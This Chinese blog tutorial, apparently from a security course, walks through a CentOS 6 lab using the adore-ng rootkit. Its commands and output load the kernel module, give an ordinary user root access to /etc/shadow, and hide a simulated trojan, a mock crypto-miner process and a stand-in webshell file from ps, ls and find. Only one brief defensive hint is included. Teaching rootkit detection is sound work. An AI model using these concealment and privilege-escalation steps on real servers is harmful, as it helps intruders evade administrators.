Linux下手动查杀木马过程
文章目录
- 1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)
- 1.1Rootkit概述
- 1.2实战-通过rootkit隐蔽行踪
- 1、安装adore-ng
- 2、测试,查看帮助:
- 实战1:演示ava提权功能
- 1、准备测试环境
- 2、创建一个普通用户
- 3、通过ava命令提权,让普通用户xinsz08可以获得root权限
- 4、使用r命令选项提权
- 5、在别一个终端上查看,运行此vim进程的用户身份是root,说明提权成功
- 实战2:隐藏你的木马程序
- 1、模拟一个木马程序:
- 2、打开另一个终端,以root身份可以查看到木马程序
- 3、隐藏进程
- 4、打开另一个终端,以root身份无法查看到木马程序
- 实战3: 黑客隐藏木马程序文件
- 1、创建测试文件
- 2、隐藏文件
- 3、尝试找出来webshell.php
1 使用rootkit把木马程序的父进程和木马文件隐藏 (此章节实验需在CentOS 6下进行)
1.1Rootkit概述
Rootkit概述:Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。我们接下来讲介绍 adore-ng (rootkit其中一种)的使用方法。 注:adore [əˈdɔ:®] 崇拜
adore-ng可以在linux系统下实现:提权,隐藏进程号,隐藏文件等功能
官网:https://github.com/trimpsyw/adore-ng
1.2实战-通过rootkit隐蔽行踪
实战背景: 当黑客已经上传了木马-》获得普通权限-》提权成root -》现在开始使用rootkit隐蔽行踪。
1、安装adore-ng
上传adore-ng-master.zip到linux系统上
root@xinsz08-1 yum.repos.d]# rpm -ivh /mnt/Packages/kernel-devel-2.6.32-431.el6.x86_64.rpm #安装依赖包
[root@zmedu63 ~]# unzip adore-ng-master.zip
[root@zmedu63 ~]# cd adore-ng-master
[root@zmedu63 adore-ng-master]# make -j 4 #编译,将源码编译成二进制文件,不需要执行make install 文件
[root@zmedu63 adore-ng-master]# insmod adore-ng.ko #加载模块。
2、测试,查看帮助:
[root@zmedu63 adore-ng-master]# ./ava
Usage: ./ava {h,u,r,R,i,v,U} [file or PID]I print info (secret UID etc)h hide file #隐藏文件u unhide filer execute as root #可以提权,以root身份运行程序R remove PID foreverU uninstall adorei make PID invisible #隐藏进程。隐藏你的木马程序v make PID visible
实战1:演示ava提权功能
1、准备测试环境
创建一个普通用户于测试。然后在普通用户上,通过ava命令,提权后,以root身份运行一个进程。
提权概述:提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升普通用户的权限以夺得该服务器超级管理员权限。
2、创建一个普通用户
[root@xinsz08-1 ~]# useradd xinsz08
[root@xinsz08-1 ~]# echo 123456 |passwd --stdin xinsz08
3、通过ava命令提权,让普通用户xinsz08可以获得root权限
[root@zmedu63 adore-ng-master]# cp -r /root/adore-ng-master /tmp/ #复制木马程序到到/tmp,让普通用户xinsz08可以执行ava命令,方便演示提权
[root@zmedu63 adore-ng-master]# chmod 777 /tmp/adore-ng-master/ -R #让xinsz08普通用户也可以使用木马程序
[root@zmedu63 adore-ng-master]# ssh xinsz08@192.168.1.63 #以普通帐号登录
[mk@zmedu63 ~]$ cd /tmp/adore-ng-master/
4、使用r命令选项提权
[mk@zmedu63 adore-ng-master]$ ll /etc/shadow #普通用户对shadow没有权限
---------- 1 root root 1071 Apr 7 10:17 /etc/shadow
[mk@zmedu63 adore-ng-master]$ vim /etc/shadow #发现打开,看不到内容,说明没有权限
使用ava提权
[mk@zmedu63 adore-ng-master]$ ./ava r vim /etc/shadow #编辑时,可以写入一些内容,可以正常写入。说明提权成功。
5、在别一个终端上查看,运行此vim进程的用户身份是root,说明提权成功
[root@zmedu63 ~]# ps -axu | grep shadow
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root 6874 0.1 0.1 10216 2924 pts/3 S+ 04:12 0:00 /usr/bin/vim /etc/shadow
root 6879 0.0 0.0 4024 692 pts/2 S+ 04:12 0:00 grep shadow
实战2:隐藏你的木马程序
1、模拟一个木马程序:
[mk@zmedu63 adore-ng-master]$ vim hack.sh
#!/bin/bash
while true
doecho `date` >> /tmp/date.txtsleep 1
done
[mk@zmedu63 adore-ng-master]$ chmod +x hack.sh #赋予执行权限[root@zmedu63 adore-ng-master]$ ./hack.sh & #后台执行
2、打开另一个终端,以root身份可以查看到木马程序
[root@zmedu63 ~]# ps -axu | grep hack.sh
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.8/FAQ
mk 6339 0.0 0.1 106148 1184 pts/3 S 10:32 0:00 /bin/bash ./hack.sh
3、隐藏进程
[mk@zmedu63 adore-ng-master]$ ./ava i 6339 #隐藏进程
56,500,500,56
Adore 1.56 installed. Good luck.
Made PID 6339 invisible.
4、打开另一个终端,以root身份无法查看到木马程序
[root@zmedu63 ~]# ps -axu | grep hack.sh #已经找不到木马程序了
扩展:miner 矿工, minerd是一个挖比特币的木马程序 ,很多服务器被黑后,在深夜默默挖矿或被用于流量攻击。
[mk@zmedu63 adore-ng-master]$ cp hack.sh minerd.sh #模拟一个挖矿木马
[mk@zmedu63 adore-ng-master]$ ./minerd.sh &
[2] 4553
[mk@zmedu63 adore-ng-master]$ ./ava i 4553 #隐藏挖矿木马进程,这样管理员就找不出来谁占了CPU了。有一些黑客没有隐藏进程,就会被发现。 如下图,就是阿里云平台上发现的一个木马报警信息。
总结:当黑客隐藏进程后,找不出隐藏的进程,怎么办? 当进程找不到时,可以查找一下被黑那天或前几天产生的新文件,进行分析。重点下可以让黑客在网页上上传文件的目录。如我的网站存储用户上传头像或图片的目录是/var/www/html/images ,那么可以执行:
[root@zmedu63 ~]# find /var/www/html/images -mtime -1 #查找上传的文件
实战3: 黑客隐藏木马程序文件
实战场景:因为运维人员,可以按时间查出我的木马,所以我们可以把文件隐藏后,再执行木马程序。然后再把进程隐藏了。 这样运维人员,就彻底找不出后门了。
1、创建测试文件
[mk@zmedu63 adore-ng-master]$ mkdir test #创建一个测试目录
[mk@zmedu63 adore-ng-master]$ cd test/
[mk@zmedu63 test]$ echo aaaa > webshell.php #模拟一个木马
[mk@zmedu63 test]$ cat webshell.php
aaaa
[mk@zmedu63 test]$ touch b.php #创建一个普通文件
[mk@zmedu63 test]$ ls
b.php webshell.php
2、隐藏文件
[mk@zmedu63 test]$ /tmp/adore-ng-master/ava h webshell.php
56,500,500,56
Adore 1.56 installed. Good luck.
File 'webshell.php' is now hidden.
3、尝试找出来webshell.php
[mk@zmedu63 test]$ ls #没有发现webshell.php文件。
b.php
[mk@localhost test]$ ls -a #使用-a选项也没有发现webshell.php文件
. .. b.php尝试查找最近被黑客修改或创建的文件
[mk@zmedu63 test]$ find ./ -mtime -1 #还是没有发现
[mk@zmedu63 test]$ cat ./webshell.php #黑客手动查看这个文件,还存在此目录下的,因为黑客自己知道文件的名字和路径,所以黑客自己还是可以执行木马的。
恢复出来:
[mk@zmedu63 test]$ /tmp/adore-ng-master/ava u webshell.php
56,500,500,56
Adore 1.56 installed. Good luck.
File 'webshell.php' is now visible.[mk@zmedu63 test]$ ls
b.php webshell.php
Linux下手动查杀木马过程相关推荐
- Linux 下手动查杀木马过程
模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的 3 种方法: (1).计划任务: crontab (2).开机启动 (3).系统命令被人替换,定一个触发事件 生成木马程序病原体 # vi ...
- Linux下手动查杀木马
一. 模拟木马程序病原体并让木马程序自动运行 黑客让脚本自动执行的三种方法: 计划任务,crontab:开机启动:系统命令被替换,使用命令后被触发. 1. 生成木马程序病原体 [root@xuegod ...
- Linux下Verilog仿真过程(二)
上一篇Linux下Verilog仿真过程(一)已经介绍了Verilog基本仿真问题 只不过仿真结果输出只是简单输出,不是很形象. 下面看一下"gui(图形用户界面)"的仿真结果. ...
- Linux下安装RealPlayer过程与问题(ubuntu版)
在Ubuntu操作系统中安装Realplayer时,经常是提到只要用sudo apt-get install realplayer命令就可以解决了,但是事实中这个命令总是不能解决问题,我们在实际使用这 ...
- 浅析Linux下gcc编译过程
目录 1. gcc简介及基本用法 2. gcc编译过程 3. 静态链接和动态链接 4. 静态库和动态库 4.1 静态库的制作和使用 4.2 动态库的制作和使用 1. gcc简介及基本用法 GCC( ...
- ubuntu linux下安装boch过程
记录一下linux下安装boch需要注意的地方. 1. 在新安装的ubuntu的linux后,需要立即编辑源列表文件.具体方法见: http://wiki.ubuntu.org.cn/Qref/Sou ...
- Linux查看ice版本,转Linux下安装Ice过程
ICE在Linux下的完整编译安装 安装平台要求:最好用gcc 4.x版编译ICE,在Slackware下发现gcc3.3.6和gcc3.4.6都无法编译通过 为了方便管理,将ICE相关的软件都安装到 ...
- linux怎么进入root文件,linux下安装ROOT过程
说明: 这是我安装ROOT的过程,仅供参考,如果有哪个地方没说清楚或者有错误,非常希望能告诉我.如果想对ROOT安装有详尽的了解,可以参考官网的说明. 我的linux发行版为Ubuntu14.04,R ...
- linux下 DNS配置过程『罗斌原创』
DNS配置过程 任务1:配置主DNS 1.检查是否安装了bind软件包,rpm -qa | grep bind 如果没有安装则挂载第四张光盘, mount -t iso9660 /dev/cdrom ...
最新文章
- 自动化监控--zabbix中的用户和用户组详解
- 【译】Diving Into The Ethereum VM Part 4 - How To Decipher A Smart Contract Method Call
- IDEA把Java Web导出为war文件
- 高性能视频推理引擎优化技术
- 洛谷—P1307 数字反转
- Matlab 画图字体,字号的设定,图片大小和比例
- http协议知识msdn
- JS 日期对象常用函数(时间常用函数、日期格式化)
- 学习索引结构的一些案例——Jeff Dean在SystemML会议上发布的论文(下)
- 枚举进程ID并且获得进程路径
- 创建phpinfo.php
- Selenium2+python自动化6-八种元素元素定位(Firebug和firepath)
- time stamp convert
- 三月校赛1006 wuli通通和Fibonacci (a[n]=f[n]*(n^m)的前k项和)
- 16.火焰传感器实验
- python四位数字加密_python实现字符串加密成纯数字
- H5新特性 - 新增标签
- 如何在服务器上配置深度学习环境
- G002-186-18
- fabric框架学习
热门文章
- 5.微博绑定用户接口
- 如何查看MySQL数据库的版本
- 中国第一封email
- 书法练字帖纸——井字格获得国家知识产权局专利证书
- SpringBoot重点详解--整合hive-jdbc
- 计算机毕设Python+Vue医院管理系统(程序+LW+部署)
- 计算机视频分析,暴雨/夜间/人群密集难倒视频分析?三篇CVPR2021论文攻克这些难题...
- python在工业机器人上的应用_请简述工业机器人主要应用场合
- 网络版计算机化系统3q认证,高效液相液色仪3Q认证服务|气相色谱仪3Q认证确认服务...
- IntentFilter简述